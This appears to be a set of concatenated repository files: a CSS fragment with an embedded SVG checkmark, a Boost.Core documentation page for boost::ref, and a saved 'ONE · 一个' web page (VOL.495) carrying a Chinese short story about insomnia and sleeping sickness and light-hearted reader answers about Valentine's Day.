url("data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9Im5vIj8+CjxzdmcKICAgeG1sbnM6ZGM9Imh0dHA6Ly9wdXJsLm9yZy9kYy9lbGVtZW50cy8xLjEvIgogICB4bWxuczpjYz0iaHR0cDovL2NyZWF0aXZlY29tbW9ucy5vcmcvbnMjIgogICB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiCiAgIHhtbG5zOnN2Zz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciCiAgIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIKICAgdmVyc2lvbj0iMS4xIgogICB2aWV3Qm94PSIwIDAgMSAxIgogICBwcmVzZXJ2ZUFzcGVjdFJhdGlvPSJ4TWluWU1pbiBtZWV0Ij4KICA8cGF0aAogICAgIGQ9Ik0gMC4wNDAzODA1OSwwLjYyNjc3NjcgMC4xNDY0NDY2MSwwLjUyMDcxMDY4IDAuNDI5Mjg5MzIsMC44MDM1NTMzOSAwLjMyMzIyMzMsMC45MDk2MTk0MSB6IE0gMC4yMTcxNTcyOSwwLjgwMzU1MzM5IDAuODUzNTUzMzksMC4xNjcxNTcyOSAwLjk1OTYxOTQxLDAuMjczMjIzMyAwLjMyMzIyMzMsMC45MDk2MTk0MSB6IgogICAgIGlkPSJyZWN0Mzc4MCIKICAgICBzdHlsZT0iZmlsbDojZmZmZmZmO2ZpbGwtb3BhY2l0eToxO3N0cm9rZTpub25lIiAvPgo8L3N2Zz4K"); } .checkboxLabel { position: relative; cursor: pointer; margin: 0; } .mdl-checkbox__input[disabled] + .checkboxLabel { color: rgba(0, 0, 0, 0.26); cursor: auto; } .checkboxList .mdl-checkbox { display: flex; margin: .5em 0; } .checkboxList-paperList { padding: 1em !important; }
myodd/boost/libs/core/doc/html/boost/ref_idm45398594477968.html
FFMG/myoddweb.piger
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=US-ASCII"> <title>Function template ref</title> <link rel="stylesheet" href="../../../../../doc/src/boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.79.1"> <link rel="home" href="../index.html" title="Chapter&#160;1.&#160;Boost.Core"> <link rel="up" href="../core/ref.html#header.boost.core.ref_hpp" title="Header &lt;boost/core/ref.hpp&gt;"> <link rel="prev" href="unwrap_reference.html" title="Struct template unwrap_reference"> <link rel="next" href="cref_idm45398594473152.html" title="Function template cref"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../../boost.png"></td> <td align="center"><a href="../../../../../index.html">Home</a></td> <td align="center"><a href="../../../../../libs/libraries.htm">Libraries</a></td> <td align="center"><a href="http://www.boost.org/users/people.html">People</a></td> <td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td> <td align="center"><a href="../../../../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="unwrap_reference.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../core/ref.html#header.boost.core.ref_hpp"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../index.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="cref_idm45398594473152.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a> </div> <div class="refentry"> <a name="boost.ref_idm45398594477968"></a><div class="titlepage"></div> <div class="refnamediv"> <h2><span class="refentrytitle">Function template ref</span></h2> <p>boost::ref</p> </div> <h2 xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv-title">Synopsis</h2> <div xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv"><pre class="synopsis"><span class="comment">// In header: &lt;<a class="link" href="../core/ref.html#header.boost.core.ref_hpp" title="Header &lt;boost/core/ref.hpp&gt;">boost/core/ref.hpp</a>&gt; </span> <span class="keyword">template</span><span class="special">&lt;</span><span class="keyword">typename</span> T<span class="special">&gt;</span> <a class="link" href="reference_wrapper.html" title="Class template reference_wrapper">reference_wrapper</a><span class="special">&lt;</span> <span class="identifier">T</span> <span class="special">&gt;</span> <span class="keyword">const</span> <span class="identifier">ref</span><span class="special">(</span><span class="identifier">T</span> <span class="special">&amp;</span> t<span class="special">)</span><span class="special">;</span></pre></div> <div class="refsect1"> <a name="idm45351409174848"></a><h2>Description</h2> <p> </p> <p>Does not throw. </p> <p> </p> <div class="variablelist"><table border="0" class="variablelist compact"> <colgroup> <col align="left" valign="top"> <col> </colgroup> <tbody><tr> <td><p><span class="term">Returns:</span></p></td> <td><p><code class="computeroutput"><a class="link" href="reference_wrapper.html" title="Class template reference_wrapper">reference_wrapper</a>&lt;T&gt;(t)</code> </p></td> </tr></tbody> </table></div> </div> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright &#169; 2014 Peter Dimov<br>Copyright &#169; 2014 Glen Fernandes<br>Copyright &#169; 2014 Andrey Semashev<p> Distributed under the <a href="http://boost.org/LICENSE_1_0.txt" target="_top">Boost Software License, Version 1.0</a>. </p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="unwrap_reference.html"><img src="../../../../../doc/src/images/prev.png" alt="Prev"></a><a accesskey="u" href="../core/ref.html#header.boost.core.ref_hpp"><img src="../../../../../doc/src/images/up.png" alt="Up"></a><a accesskey="h" href="../index.html"><img src="../../../../../doc/src/images/home.png" alt="Home"></a><a accesskey="n" href="cref_idm45398594473152.html"><img src="../../../../../doc/src/images/next.png" alt="Next"></a> </div> </body> </html>
one-app/article/vol.495.html
wonderflow/bash-script
<!DOCTYPE html> <html xmlns:wb="http://open.weibo.com/wb"> <head> <title>VOL.495 - 「ONE · 一个」</title> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" /> <meta property="wb:webmaster" content="8e339239b6b0dbd3" /> <meta name="format-detection" content="telephone=no" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /> <meta name="apple-mobile-web-app-capable" content="yes" /> <meta name="apple-touch-fullscreen" content="yes" /> <meta property="og:type" content="article" /> <meta property="og:url" content="http://wufazhuce.com/one/vol.495" /> <meta property="og:site_name" content="ONE · 一个" /> <meta property="og:title" content="「ONE · 一个」VOL.495" /> <meta name="description" property="og:description" itemprop="description" content="《她在睡梦中》我们俩还真是奇怪呢,一个想睡却睡不着的人,和一个不想睡却总是睡着的人。 / 单身如何优雅地度过情人节?" /> <meta property="og:image" content="http://pic.yupoo.com/hanapp/Dx2nRoJW/29456.jpg" /> <script src="http://libs.useso.com/js/jquery/1.11.1/jquery.min.js"></script> <link rel="stylesheet" href="http://s2-cdn.wufazhuce.com/bootstrap3/css/bootstrap.min.css"> <script src="http://libs.useso.com/js/bootstrap/3.2.0/js/bootstrap.min.js"></script> <link rel="stylesheet" href="http://s2-cdn.wufazhuce.com/css/one.css"> <link rel="shortcut icon" type="image/x-icon" href="http://s2-cdn.wufazhuce.com/images/favicons/favicon.ico"> <link rel="apple-touch-icon" href="http://s2-cdn.wufazhuce.com/images/favicons/apple-touch-icon.png"> <!--[if lt IE 9]> <script src="http://libs.useso.com/js/html5shiv/3.7/html5shiv.min.js"></script> <script src="http://libs.useso.com/js/respond.js/1.4.2/respond.min.js"></script> <link href="http://s2-cdn.wufazhuce.com/respond-proxy.html" id="respond-proxy" rel="respond-proxy" /> <link href="/respond.proxy.gif" id="respond-redirect" rel="respond-redirect" /> <script src="/respond.proxy.js"></script> <![endif]--> </head> <body id="angOne_view"> <div id="header"> <div class="navbar navbar-default" role="navigation"> <div class="container"> <div class="navbar-inner"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#navbar-collapse-1"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a href="http://wufazhuce.com/" class="navbar-brand"></a> </div> <div class="collapse navbar-collapse" id="navbar-collapse-1" role="navigation"> <ul class="nav navbar-nav navbar-right"> <li> <a href="http://wufazhuce.com/one">一个</a> </li> <li> <a href="http://wufazhuce.com/noticias">情报</a> </li> <li> <a href="http://hanhanbook.taobao.com/" target="_blank">产品</a> </li> <li> <a href="http://wufazhuce.org/" target="_blank">谈谈</a> </li> </ul> </div> </div> </div> </div> </div> <div id="main-container" class="container"> <nav id="one-navbar" class="navbar navbar-default navbar-fixed-bottom" role="navigation"> <div class="container"> <div class="row"> <div class="col-sm-offset-1 col-sm-10 col-md-offset-1 col-md-10 col-lg-offset-2 col-lg-8"> <ul class="nav navbar-nav"> <li class="active"><a href="#tab-imagen" data-toggle="tab"> <span class="visible-xs">ONE<br />首页</span> <span class="hidden-xs">ONE 首页</span> </a></li> <li><a href="#tab-articulo" data-toggle="tab"> <span class="visible-xs">ONE<br />文章</span> <span class="hidden-xs">ONE 文章</span> </a></li> <li><a href="#tab-cuestion" data-toggle="tab"> <span class="visible-xs">ONE<br />问题</span> <span class="hidden-xs">ONE 问题</span> </a></li> <li><a href="#tab-cosas" data-toggle="tab"> <span class="visible-xs">ONE<br />东西</span> <span class="hidden-xs">ONE 东西</span> </a></li> </ul> <ul class="nav navbar-nav navbar-right"> <li><a href="http://wufazhuce.com/one"> <span class="visible-xs">ONE<br />最近10期</span> <span class="hidden-xs">ONE 最近10期</span> </a></li> </ul> </div> </div> </div> </nav> <div class="one row"> <div class="col-sm-offset-1 col-sm-10 col-md-offset-1 col-md-10 col-lg-offset-2 col-lg-8"> <div class="tab-content"> <div class="tab-pane active" id="tab-imagen"> <div class="one-imagen"> <img src="http://pic.yupoo.com/hanapp/Dx2nRoJW/29456.jpg" alt="" /> </div> <div class="one-imagen-footer"> <div class="one-titulo"> VOL.495 </div> <div class="one-imagen-leyenda"> 致单身汉<br /> 摄影/林子072<br /> </div> <div class="clearfix"></div> </div> <div class="one-cita-wrapper"> <div class="one-cita"> 世界上本没有路,有了腿便有了路。from《让子弹飞》 </div> <div class="one-pubdate"> <p class="dom">14</p> <p class="may">Feb 2014</p> </div> <div class="clearfix"></div> </div> <div class="one-compartir"> <wb:share-button appkey="1156389752" addition="number" type="button" default_text="世界上本没有路,有了腿便有了路。from《让子弹飞》(「ONE · 一个」VOL.495)"></wb:share-button> <script type="text/javascript"> (function(){ var p = { url:"http:\/\/wufazhuce.com\/one\/vol.495", showcount:'1', desc:'', title:"\u4e16\u754c\u4e0a\u672c\u6ca1\u6709\u8def\uff0c\u6709\u4e86\u817f\u4fbf\u6709\u4e86\u8def\u3002from\u300a\u8ba9\u5b50\u5f39\u98de\u300b\uff08\u300cONE \u00b7 \u4e00\u4e2a\u300dVOL.495\uff09", summary:'', pics:'', site:'「ONE · 一个」', style:'102', width:145, height:26 }; var s = []; for(var i in p){ s.push(i + '=' + encodeURIComponent(p[i]||'')); } document.write(['<a version="1.0" class="qzOpenerDiv" href="http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?',s.join('&'),'" target="_blank">分享</a>'].join('')); })(); </script> <script src="http://qzonestyle.gtimg.cn/qzone/app/qzlike/qzopensl.js#jsdate=20111201" charset="utf-8"></script> </div> <div class="one-comentarios"> <div id="vanilla-comments"></div> <script type="text/javascript"> var vanilla_forum_url = 'http://wufazhuce.org/'; var vanilla_identifier = "one-vol.495"; // var vanilla_discussion_id = ''; var vanilla_category_id = '19'; (function() { var vanilla = document.createElement('script'); vanilla.type = 'text/javascript'; var timestamp = new Date().getTime(); vanilla.src = vanilla_forum_url + '/js/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(vanilla); })(); </script> </div> </div> <div class="tab-pane" id="tab-articulo"> <div class="one-articulo"> <div class="articulo-principal"> <div class="comilla-abrir"> <div class="comilla-cerrar"> 我们俩还真是奇怪呢,一个想睡却睡不着的人,和一个不想睡却总是睡着的人。 </div> </div> </div> <h2 class="articulo-titulo"> 她在睡梦中 </h2> <p class="articulo-autor"> 作者/陈谌 </p> <div class="articulo-contenido"> <p>1.</p> <p>梁先生是我的一个朋友,他四月的时候生了一场大病,病愈后渐渐开始失眠,从起初的一晚上勉强能睡五个小时,发展到后来的三个小时,再到一晚上只能合眼一个多小时,最后他到天亮连二十分钟都睡不踏实了。</p> <p>于是就像歌里唱的那样,他在五月的早晨终于丢失了睡眠。</p> <p>然而他的这种失眠不同于其他任何人的病症,普通的失眠症患者会因为整夜无法入睡而精神萎靡,昏昏欲睡,甚至神经衰弱,然而梁先生单纯只是彻底丢失了本能的睡意而已,从五月至今,他尽管从不入睡,却也不曾感到丝毫的疲惫,没日没夜的如同打了鸡血一般精神,就仿佛他已经完全不需要睡眠这种东西了一般。用他的话说,别人只是因为睡眠短小而不能尽兴,而他则是彻彻底底地将睡眠阉割掉了,睡功能丧失,成了睡眠王国里的太监。</p> <p>这是一种寂寞的病,梁先生告诉我自从他失去了睡眠之后,生活开始变得很无聊,他曾经是个嗜睡如命的人,一天能睡十个小时,然而自从他彻底失眠后,每天的这十个小时就这样赤裸裸地空余了出来,就仿佛上帝每天往你卡里多打了十万块钱一样,你都不知道该怎么去挥霍它。</p> <p>梁先生今年三十出头,谈过几个女朋友,最后都宣布告吹,现在一个人住在一所公寓里。在确定自己失去睡眠后,他含泪把自己卧室的床给撤了,默默把它搬到了楼下的杂物间里,这本是一张很大很软的床,他花了很多积蓄买下了它,没想到现在不仅没有女人,连睡眠也没有了,于是这张漂亮的床就这么成为了一个占地方的奢侈品,让他觉得痛心疾首。现在那里被换上了一个按摩椅,他每天凌晨三点到四点坐在那里,对着墙壁思考人生。</p> <p>我有天很好奇地问他现在的夜生活是怎么样的,他说自己现在一到夜里过了十二点就变得神经质起来,因为距离第二天早晨上班还有整整九个小时,除了在凌晨两点给自己加一顿饭之外,剩下的时间空虚到令人不能自已。</p> <p>梁先生也尝试过用酒精和药物之类的东西来让自己入睡,但似乎这些东西对他一点也不起作用,多喝酒只会让他哗啦啦地吐,吃安眠药则让他觉得头疼,但睡意依然是丝毫没有的,他也不敢加大剂量,生怕暂时的睡眠没有换来,永久的睡眠就这样悄然而至了。</p> <p>看梁先生渐渐由原本的&ldquo;失眠者&rdquo;变成一个歇斯底里的&ldquo;追梦人&rdquo;,我不免觉得有些不可理喻,我时常想,为什么他是如此强烈地渴望睡眠呢,既没有丝毫困意,身体也未曾从失眠中受到什么损害,为何他还要如此迫切地去索求这几个小时完全无意识的体验呢。照常理来说,如果是我,能够永远不需要睡觉,这相当于上天间接赐给了我额外三分之一的生命啊,我与其浪费这宝贵的三分之一在睡觉上,不如用这些时间去更好地享受人生呢。</p> <p>不过我从没问过梁先生,或许对我们而言,睡眠只是一个围城而已,自从梁先生被睡眠帝国流放后,我们只是羡慕地望着他从倦意桎梏中解脱,却无法揣测他在城墙之外的心情。</p> <p>而他似乎也开始慢慢接受这种设定,不再疯狂地想要重拾睡眠,而是试着把剔除掉睡眠的时间用一些琐碎的事情填满。他学会了泡茶,学会了做蛋糕,还学会了织毛衣,一到午夜就俨然变身成一个家庭主妇,像是什么浪漫童话故事里的桥段一般,只可惜他上演的始终是自导自演的独角戏,毕竟那是一个连整座城市都在安然沉睡的时刻。他在凌晨四点给自己安排了一个&ldquo;午夜茶&rdquo;时间,在月光下喝着茶看着过期的报纸,思考着这杯茶是十二点前泡的现在算不算隔夜茶诸如此类无聊的问题,然后在那里呵呵呵地傻笑,觉得自己好像被什么遗弃了似的,是世界的孤儿。</p> <p>这样抽风的生活持续了很久,直到他遇到了昏睡不醒的周小姐。</p> <p>2.</p> <p>事情的起因发生在三个月前,梁先生在我的建议下去了一趟睡眠诊所。</p> <p>睡眠诊所的医生在了解了梁先生的状况后并没有给他开安眠药,而是开了一种抗焦虑的药物,这种药自然不能解决梁先生的睡眠问题,但却能让他不再觉得自己睡不着是件烦恼的事儿了。这不禁让我为这个医生治病的逻辑深深地捏一把汗,幸好梁先生不是去看尿床的,否则他回来以后觉得尿床一点儿不害臊可就麻烦了。</p> <p>周小姐就是梁先生在睡眠诊所的候诊室遇到的一个姑娘,这个姑娘外表看起来正常得很,和他自己一样,没有其他睡眠病患者的外部特征,于是他心想或许她和自己恰好是同一种病症。</p> <p>他走过去坐在那姑娘旁边问她道:&ldquo;嘿你好,你也是来看病的吗?&rdquo;</p> <p>&ldquo;是啊。&rdquo;</p> <p>&ldquo;你也是失眠吗?&rdquo;</p> <p>&ldquo;不是,我的病&hellip;&hellip;&rdquo;</p> <p>话没说话,那姑娘就一头栽倒在沙发上不省人事了。</p> <p>梁先生慌得一下子跳起来,扯着嗓子大喊有人晕倒了。医生从诊室里出来一看,说这姑娘只是睡着了而已,不过是深度睡眠,怎么叫也叫不醒的,过一会儿估计自己能醒来。</p> <p>等了半个小时,那姑娘果然挺尸般地忽然坐了起来,又把梁先生给吓了一跳。</p> <p>&ldquo;不好意思,这就是我的病,一种奇怪的昏睡病,我在任何时候都可能忽然睡着,过一段时间又会自然醒来。&rdquo;</p> <p>周小姐今年二十五岁,她得这个病和梁先生一样原因不明,她说自己有天在家里吃饭的时候莫名就脸朝下倒在饭碗里睡着了,醒来的时候一脸都是饭粒,不过她很庆幸自己那天没有喝汤,不然在汤里淹死可就丢人透了,像只无头苍蝇似的。</p> <p>周小姐告诉梁先生,自从她得了这种病,就没法上班了,因为有时候走在马路上都可能忽然睡着,另外生活上也产生了诸多的麻烦,上个厕所洗个澡什么的都必须有人看着,不然随时可能一头扎进马桶里。</p> <p>梁先生也把自己的病告诉了周小姐,她听完后露出了羡慕的眼神:&ldquo;我觉得像你这样其实不坏,至少生活是足够完整的不是吗。我现在的生活完全变成了一个个零散的碎片,我对每一天已经没有了概念,因为无法预计自己什么时候会忽然睡着,醒来以后也不知道自己究竟睡了多久。&rdquo;</p> <p>&ldquo;不不,其实我并没有好到哪里去,正是由于我的意识一直都是清醒着的,每天就这样看着日出日落,天黑天明,才没有了日子的概念,任凭时间如何一分一秒地流逝,我都毫无知觉。所有的事情我现在都只能以小时来划分,用闹钟来提醒,对我而言生活就是一个无尽清醒着等待死亡的过程,毕竟睡眠曾是个多好的逃避呀,现在没有事情我能等睡一觉醒来再说了不是吗。&rdquo;梁先生如是说道。</p> <p>&ldquo;我们俩还真是奇怪呢,一个想睡却睡不着的人,和一个不想睡却总是睡着的人。&rdquo;周小姐捂着嘴笑了起来。</p> <p>&ldquo;我在想,当这个世界上一半的人在睡觉的时候,另一半人总是清醒着的,根据睡眠守恒定律,也许正是你偷走了我的睡眠也不一定呐。&rdquo;梁先生调侃道。</p> <p>他俩就这样在候诊室里聊了一个下午,整个过程还算是轻松愉快,除了周小姐其间又忽然睡过去两次以外。</p> <p>在他们各自被医生开了一些抗焦虑的药物打发走了后,周小姐忽然问起梁先生有没有女朋友。</p> <p>&ldquo;没有,我暂时没有这个打算。&rdquo;</p> <p>&ldquo;为什么呀,虽然&lsquo;睡&rsquo;对你来说已经没法发挥它不及物动词的作用了,但你依然可以发挥它及物动词的作用呀。&rdquo;</p> <p>梁先生反应了半天才惨淡地一笑道:&ldquo;嗨,还是算了,睡完女人后不能擦干净睡上一觉,世界上没有什么比这个听起来更令人感到绝望的事情了。&rdquo;</p> <p>3.</p> <p>最终梁先生还是和周小姐在一起了,对此我并不感到意外,我觉得与其说是爱情,不如说一种彼此的需要,周小姐需要人全天候的照顾,梁先生需要人填满他的生活,就连梁先生昂贵的床,也需要物尽其用。</p> <p>白天梁先生上班的时候,除了风驰电掣地上上厕所,周小姐大部分时间就在床上呆着,晚上梁先生回来了,她才能在屋里或者出门去活动活动,当然梁先生必须时时刻刻跟着她,以防她忽然睡着撞到什么东西上。</p> <p>每次周小姐洗澡的时候,梁先生都会搬个小板凳坐在门口听里面的动静,为了不让自己看起来过于像个变态,他会象征性地拿起一本书来慢慢地翻着,尽管脑子里想的事情全然与书无关。</p> <p>周小姐睡着的时候,除了整理房间做做家务以外,梁先生还会给她做吃的,然后摆在她的旁边,等她醒来后看她惊喜的表情。</p> <p>在其他时候,梁先生会和周小姐像正常情侣一样一起坐在沙发上看看电影聊聊天,唯一不同的是周小姐总会在各种各样的时刻猝不及防地睡去,只留下梁先生一个人在一旁怅然若失。对于从不入睡的梁先生而言,他时常会默默看着周小姐睡觉,他觉得她睡着的样子很美,让他想起很久之前听过的一首歌,名叫《她在睡梦中》,歌中有一句这样唱道:&ldquo;看着你睡在我身旁,像孩子一样,多想摇醒你,告诉你我有多么爱你。&rdquo;</p> <p>当然梁先生并没有这么做,倒不是他觉得这样矫情,而是无论怎么摇,周小姐都不会醒的。如此香甜而深沉的睡眠,让他时常感觉眼前的这个姑娘就仿佛他自己已然失去的睡眠一般,在另一个世界,遥不可及。</p> <p>醒来后的周小姐总会第一时间寻找梁先生,就像睡醒的孩子本能地寻找母亲一般,这渐渐变成了一种依赖。周小姐时常会问梁先生,会不会有一天醒来后再也找不到你了呢。但对于梁先生而言,他并不觉得自己会离开她,他更加担心的是周小姐有一天再也不会醒来,因为从自己逐渐失去睡眠的过程中,他仿佛看到了周小姐最后的归宿,那就是生活完全被睡眠填满。</p> <p>事实上周小姐忽然睡去的频率的确在一天天地增加,睡眠的时间也越来越长,这让梁先生感到恐慌,却又无能为力。在周小姐昏睡不醒的深夜,梁先生又开始喝茶看报纸,就像当初独自生活时一般,只不过他都会选择坐在周小姐身旁,期待她会忽然醒来。</p> <p>两个人生活在一起,却又像不生活在一起,因为有着时差,时常无法同步,周小姐需要每天穿越漫漫的睡眠之门从另一个世界来到这个世界与梁先生相见,这听起来像极了一个荒诞而凄美的爱情故事。</p> <p>终于有一天,周小姐似乎预知到了自己的未来,她趁梁先生上班的时候,留下一封信走了,她说很感谢梁先生这段时间照顾她,但是她不想再让梁先生这样一直等她醒来了,否则如果有一天她自己再也醒不来了,梁先生就要这么永远等下去了。</p> <p>周小姐究竟是怎么独自离开的,以及她最后去了哪里,都没有人知道,或许她最终能治好她的病,回来继续和梁先生生活在一起,更或许她像童话中的睡美人一般,在城堡中陷入永久的沉睡。</p> <p>只不过没有人能够吻醒她,就像冬眠的松鼠再没有了春天。</p> <p>4.</p> <p>在周小姐走后很久,梁先生才和我说起他们在一起的日子,他没有悲伤的表情,就像万里无云的天空一般,但我却能从泥土中嗅到暴雨过后的味道。</p> <p>没有了周小姐后的梁先生,他的生活并没有多少的改变,毕竟他不会感到疲惫,更不会难过到失眠,对他而言,这个世界上除了吃喝拉撒,再没有什么可失去的了。</p> <p>这一次他的床没有被搬走,他说床的作用并不只是睡觉和睡女人那么简单,有一张床摆在卧室里,能让这里看起来更像是个家。</p> <p>在万籁俱寂的凌晨时分,梁先生除了&ldquo;午夜茶&rdquo;以外,多了一件叫做思念的事情。他对我说,对于失去睡眠的人而言,思念是最大的敌人,因为除了睡眠,没有什么能够逃避思念,他觉得至少周小姐的病在这个方面要完胜他,至少人在睡着的时候不会感到心痛,还能时常梦到自己想念的人,然而他此生大概再也不会梦到周小姐了。</p> <p>我不知道该怎么安慰梁先生,毕竟对他而言没有&ldquo;明天&rdquo;,只有每个小时每一分钟甚至每一秒钟的煎熬,永恒的清醒让他的回忆变成一种持续的痛感,我试图去体会他的感受,但我却是能够一觉醒来推开窗户迎接新一天阳光的人,相比起他我是足够幸运的。</p> <p>好在梁先生是个坚强的人,他见到我总是微笑着谈起最近他在后半夜做的事情。有一天我去他家,他正在安静地写东西,一笔一画写得特别认真。</p> <p>我问他,你在干什么呢,这么投入的样子。</p> <p>他说,写日记,有助于加强对每一天的直观感受,每晚上九点准时记录过去二十四个小时发生的事情。</p> <p>我提出要看看,他紧张地用手遮住本子,露出害羞的表情。</p> <p>但我并没有强求他,因为我知道这一定是他写给周小姐的自说自话。</p> <p>而此刻客厅中音箱里放的那首《她在睡梦中》正唱到最后一句:&ldquo;我多想留下来,永远在你枕边,日夜欢愉呀,情人啊,看着我,就这样绝情地老去啊。&rdquo;</p> </div> <p class="articulo-editor"> (责任编辑:赵西栋) </p> <p class="articulo-compartir"> <wb:share-button appkey="1156389752" addition="number" type="button" default_text="她在睡梦中『我们俩还真是奇怪呢,一个想睡却睡不着的人,和一个不想睡却总是睡着的人。』(陈谌「ONE · 一个」VOL.495)"></wb:share-button> <script type="text/javascript"> (function(){ var p = { url:"http:\/\/wufazhuce.com\/one\/vol.495#articulo", showcount:'1', desc:'', title:"\u5979\u5728\u7761\u68a6\u4e2d\uff08\u9648\u8c0c\u300cONE \u00b7 \u4e00\u4e2a\u300dVOL.495\uff09", summary:"\u6211\u4eec\u4fe9\u8fd8\u771f\u662f\u5947\u602a\u5462\uff0c\u4e00\u4e2a\u60f3\u7761\u5374\u7761\u4e0d\u7740\u7684\u4eba\uff0c\u548c\u4e00\u4e2a\u4e0d\u60f3\u7761\u5374\u603b\u662f\u7761\u7740\u7684\u4eba\u3002", pics:'', site:'「ONE · 一个」', style:'102', width:145, height:26 }; var s = []; for(var i in p){ s.push(i + '=' + encodeURIComponent(p[i]||'')); } document.write(['<a version="1.0" class="qzOpenerDiv" href="http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?',s.join('&'),'" target="_blank">分享</a>'].join('')); })(); </script> <script src="http://qzonestyle.gtimg.cn/qzone/app/qzlike/qzopensl.js#jsdate=20111201" charset="utf-8"></script> </p> <div class="one-comentarios"> </div> </div> </div> <div class="tab-pane" id="tab-cuestion"> <div class="one-cuestion"> <div class="cuestion-q-icono"></div> <h4> 单身如何优雅地度过情人节? </h4> <div class="cuestion-contenido"> @一个App工作室问:单身如何优雅地度过情人节? </div> <hr /> <div class="cuestion-a-icono"></div> <h4> 网友答@一个App工作室: </h4> <div class="cuestion-contenido"> <p>@王茹萍想当动物园园长:情人节是什么?&nbsp;</p> <p>@Rool-车轮:物以稀为贵,所以情人节有两个,光棍节只有一个。</p> <p>@FlyingEnid:提前订一束硕大的玫瑰花送到公司送到任何人看得到的地方,然后抱着从街头走到街尾。Fuck!太伤感了!</p> <p>@Super--Miao:叫上一众单身好基友,伪装成便衣警察去各大宾馆扫黄。</p> <p>@心锐R:玩&ldquo;连连看&rdquo;,能消灭多少对消灭多少对。</p> <p>@Z星球小祖咒:情人节那天我会刷空间和微博,谁要是在空间或者微博里面秀恩爱,我就截图,等到丫结婚时候对象不是现在的那人,我就把照片放在红包里给丫送过去。</p> <p>@睫上流光:这个情人节,我总算有理由骂那些只顾出去玩而不陪父母过元宵的人的机会了!</p> <p>@霏同学是坚硬的锡兵:打扮得漂漂亮亮出去卖花什么的,让男生看你然后只跟男生说话,最后导致人家情人节吵架,不能生更多的处女座出来!</p> <p>@M-i-k-o:做三套高考模拟题。</p> <p>@Tree-Yellow:单词没背,作业没做,过毛情人节!</p> <p>@lEriczz:来盘玫瑰味的元宵吧。</p> <p>@Allen_M__:买一束花,走在路上,看谁也是落寞的一个人,就送过去,说声&ldquo;单身快乐&rdquo;。</p> <p>@王智政:那天全球华人不是都过节么,当然是吃着元宵看晚会,人生第一次能在情人节这天过上节,知足了。</p> <p>@Gal-陈霖:打10086客服,开口第一句是,我知道你也很寂寞。</p> <p>@西门庆是真的爱:略过。</p> <p>@丹白质:难过。</p> <p>@链之风景:一笑而过。</p> <p>@王二花花花二:我已经订了张机票,到时候和空姐合拍一张发微博,就说我专门为了空姐女友,坐她的这次航班,陪她过节。</p> <p>@韩小嵩同學:2月14日,你们只知道是情人节,可你们是否知道在100多年前,北洋水师全军覆没,向日军投降。</p> <p>@liassic:情书要用左手写,毕竟要给右手一个惊喜嘛。</p> <p>@浮世浮沉丶:我能想到最浪漫的事就是去东莞看一看你。</p> <p>@Mandy要改变自己:给喜欢的人发短信,祝他元宵节快乐!</p> <p>@章栋:尽快找到自己的情人,努力让情人变成亲人,19年之后的今天能和他们坐在一起吃汤圆。</p> </div> <p class="cuestion-editor"> (责任编辑:赵西栋) </p> <div class="cuestion-compartir"> <wb:share-button appkey="1156389752" addition="number" type="button" default_text="网友答@一个App工作室: 单身如何优雅地度过情人节?(「ONE · 一个」VOL.495)"></wb:share-button> <script type="text/javascript"> (function(){ var p = { url:"http:\/\/wufazhuce.com\/one\/vol.495#cuestion", showcount:'1', desc:'', title:"\u7f51\u53cb\u7b54@\u4e00\u4e2aApp\u5de5\u4f5c\u5ba4\uff1a \u5355\u8eab\u5982\u4f55\u4f18\u96c5\u5730\u5ea6\u8fc7\u60c5\u4eba\u8282\uff1f\uff08\u300cONE \u00b7 \u4e00\u4e2a\u300dVOL.495\uff09", summary:"@\u4e00\u4e2aApp\u5de5\u4f5c\u5ba4\u95ee\uff1a\u5355\u8eab\u5982\u4f55\u4f18\u96c5\u5730\u5ea6\u8fc7\u60c5\u4eba\u8282\uff1f", pics:'', site:'「ONE · 一个」', style:'102', width:145, height:26 }; var s = []; for(var i in p){ s.push(i + '=' + encodeURIComponent(p[i]||'')); } document.write(['<a version="1.0" class="qzOpenerDiv" href="http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?',s.join('&'),'" target="_blank">分享</a>'].join('')); })(); </script> <script src="http://qzonestyle.gtimg.cn/qzone/app/qzlike/qzopensl.js#jsdate=20111201" charset="utf-8"></script> </div> <div class="one-comentarios"> </div> </div> </div> <div class="tab-pane" id="tab-cosas"> <div class="one-cosas"> <div class="cosas-imagen"> <img alt="" /> </div> <h2 class="cosas-titulo"> </h2> <div class="cosas-contenido"> </div> <div class="cosas-compartir"> <wb:share-button 